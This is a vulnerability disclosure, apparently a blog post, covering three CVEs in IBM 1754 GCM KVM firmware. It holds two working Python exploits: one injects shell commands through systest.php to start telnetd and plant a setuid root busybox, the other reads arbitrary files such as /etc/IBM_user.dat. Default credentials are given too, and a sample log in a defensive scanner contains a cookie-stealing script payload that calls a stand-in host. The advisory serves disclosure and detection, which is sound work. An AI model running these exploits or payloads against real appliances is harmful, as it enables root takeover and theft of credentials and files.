Product description
The IBM 1754 GCM products provide KVM over IP and serial console management technology in a single appliance. The vulnerabilities are present in firmware versions v1.20.0.22575 and earlier.
These vulnerabilities extend to similar KVM products from other manufacturers. At least some Dell models of this rebranded KVM are also vulnerable. Dell has not responded to my notification. Other manufacturers may be affected as well.

1. Remote code execution
CVEID: CVE-2014-2085
Description: Improperly sanitized input parameters allow a remote authenticated attacker to execute code on the KVM's operating system. The injection point is the lpres parameter of systest.php, whose value evidently reaches a shell: the PoC below closes the intended command with ';' and appends commands that start telnetd and copy busybox to /tmp/su with the setuid bit set, so that a telnet login as user target (password target) followed by "/tmp/su -" with password "root" yields a root shell. Any account with a valid avctSessionId session cookie suffices; the default account is "Admin" with a blank password.
Proof of concept (PoC):
#!/usr/bin/env python3

"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is necessary for this to work, so you need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""

from io import BytesIO
import os
import pycurl

sessid = "1111111111"   # value of the avctSessionId cookie of a logged-in session
target = "192.168.0.10"

# The lpres value is interpolated into a shell command without sanitization.
# The payload terminates that command with ';' and appends:
#   /usr/sbin/telnetd          start a telnet server on the device
#   cp /bin/busybox /tmp/su    copy the multi-call binary
#   chmod 6755 /tmp/su         make the copy setuid/setgid root
durl = ("https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;"
        "%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;")
storage = BytesIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)   # certificate verification disabled, as in the original PoC
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    print("[*] Sending GET to " + target + " with session id " + sessid + "...")
    c.perform()
except pycurl.error as e:
    print("[!] curl error: " + str(e))
finally:
    c.close()
    print("[*] Done")
print("[*] Trying telnet...")
print("[*] Login as target/target, then do /tmp/su - and enter password \"root\"")
os.system("telnet " + target)
2. Arbitrary file read
CVEID: CVE-2014-3081
Description: The device lets any authenticated user read any file on the KVM. The filename parameter of prodtest.php is used as a path with no restriction to a directory or an allowlist, so an absolute path anywhere on the appliance is returned to the caller; the PoC below retrieves /etc/IBM_user.dat.

Proof of concept (PoC):
#!/usr/bin/env python3
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device.
SessionId (avctSessionId) is necessary for this to work, so you need a valid user.
alex.a.bravo@gmail.com
"""

from io import BytesIO
import pycurl

sessid = "1111111111"   # value of the avctSessionId cookie of a logged-in session
target = "192.168.0.10"
path = "/etc/IBM_user.dat"   # absolute path of the file to read on the device

# prodtest.php uses the filename parameter as a path without restriction and
# returns the file contents wrapped in HTML table cells.
durl = ("https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + path)
storage = BytesIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)   # certificate verification disabled, as in the original PoC
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    c.perform()
except pycurl.error as e:
    print("[!] curl error: " + str(e))
finally:
    c.close()

# Strip the table cell tags the page wraps around the file contents.
content = storage.getvalue().decode("utf-8", "replace")
print(content.replace("<td>", "").replace("</td>", ""))
3. Cross site scripting non-persistent
CVEID: CVE-2014-3080
Description: The system is vulnerable to reflected cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this with a specially crafted URL to execute script in a victim's browser within the security context of the device's web interface once the URL is clicked, and use it to steal the victim's cookie-based authentication credentials, such as the avctSessionId session cookie that the two PoCs above rely on.
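The three issues above share one signature: a crafted query string sent to the device's PHP pages. The following detection check is an added example, not code from the original advisory or from IBM. It scans web-server access-log lines for requests to systest.php whose lpres value contains shell metacharacters (CVE-2014-2085), for prodtest.php requests whose filename value is an absolute path or contains traversal (CVE-2014-3081), and for a script payload in any parameter of any page (CVE-2014-3080, whose vulnerable parameter is not published). The log line format, the sample entries and the helper names are assumptions; the page does not show what the appliance logs. The query string is split on '&' only, because the ';' that some parsers treat as a separator is exactly the injection character here.

```python
#!/usr/bin/env python3
"""Flag access-log requests that match the GCM exploitation patterns.

Added example: the log format and sample lines below are constructed for
illustration; they are not real output of an IBM 1754 GCM appliance.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample data in a Common Log Format style (not real device logs).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2014:10:01:02 +0000] "GET /systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20; HTTP/1.1" 200 512
10.0.0.5 - - [17/Jul/2014:10:01:09 +0000] "GET /prodtest.php?engage=video_bits&display=results&filename=/etc/IBM_user.dat HTTP/1.1" 200 2048
10.0.0.7 - - [17/Jul/2014:10:02:00 +0000] "GET /prodtest.php?engage=video_bits&display=results&filename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [17/Jul/2014:10:03:00 +0000] "GET /systest.php?lpres=1 HTTP/1.1" 200 128
10.0.0.9 - - [17/Jul/2014:10:04:00 +0000] "GET /index.php?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 300
10.0.0.9 - - [17/Jul/2014:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD url PROTO", status ...
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Characters that end or chain a shell command once lpres reaches a shell.
SHELL_META = re.compile(r'[;|&`$\n]')
# Markers of a reflected script payload (the vulnerable parameter is not published).
XSS_HINT = re.compile(r'<\s*script|javascript:|\bon(error|load|mouseover)\s*=', re.IGNORECASE)


def parse_query(query):
    """Split a query string on '&' only and percent-decode names and values.

    urllib's parse_qs treated ';' as a separator in older Python releases, which
    would hide the very character the CVE-2014-2085 payload relies on.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def classify(url):
    """Return a list of (cve, reason) findings for one request URL."""
    parts = urlsplit(url)
    path = parts.path.lower()
    params = parse_query(parts.query)
    findings = []
    if path.endswith("/systest.php"):
        for value in params.get("lpres", []):
            if SHELL_META.search(value):
                findings.append(("CVE-2014-2085", "shell metacharacters in lpres: %r" % value))
    if path.endswith("/prodtest.php"):
        for value in params.get("filename", []):
            if value.startswith("/") or ".." in value:
                findings.append(("CVE-2014-3081", "absolute or traversing filename: %r" % value))
    for name, values in params.items():
        if any(XSS_HINT.search(v) for v in values):
            findings.append(("CVE-2014-3080", "script payload in parameter %s" % name))
    return findings


def scan_log(text):
    """Return [(src, ts, cve, reason)] for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for cve, reason in classify(m.group("url")):
            hits.append((m.group("src"), m.group("ts"), cve, reason))
    return hits


if __name__ == "__main__":
    for src, ts, cve, reason in scan_log(SAMPLE_LOG):
        print("%s %s %s: %s" % (ts, src, cve, reason))
```

Run against the constructed sample, the scanner reports four hits: the command injection, the two file reads and the script probe, while the benign systest.php and index.php requests pass. The filename rule deliberately flags any absolute path, since prodtest.php is supposed to serve only its own test artifacts; tune it to an allowlist if the device's legitimate values are known.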



Vendor response:
IBM released firmware version 1.20.20.23447 in response.

Timeline:
2014-05-20 - Vendor (IBM PSIRT) notified
2014-05-21 - IBM assigns internal ID
2014-07-16 - Patch published
2014-07-17 - Vulnerability publicly disclosed

External information:
IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
Info about the vulnerability (Spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html



Nube de Bits, 2011. Powered by Blogger.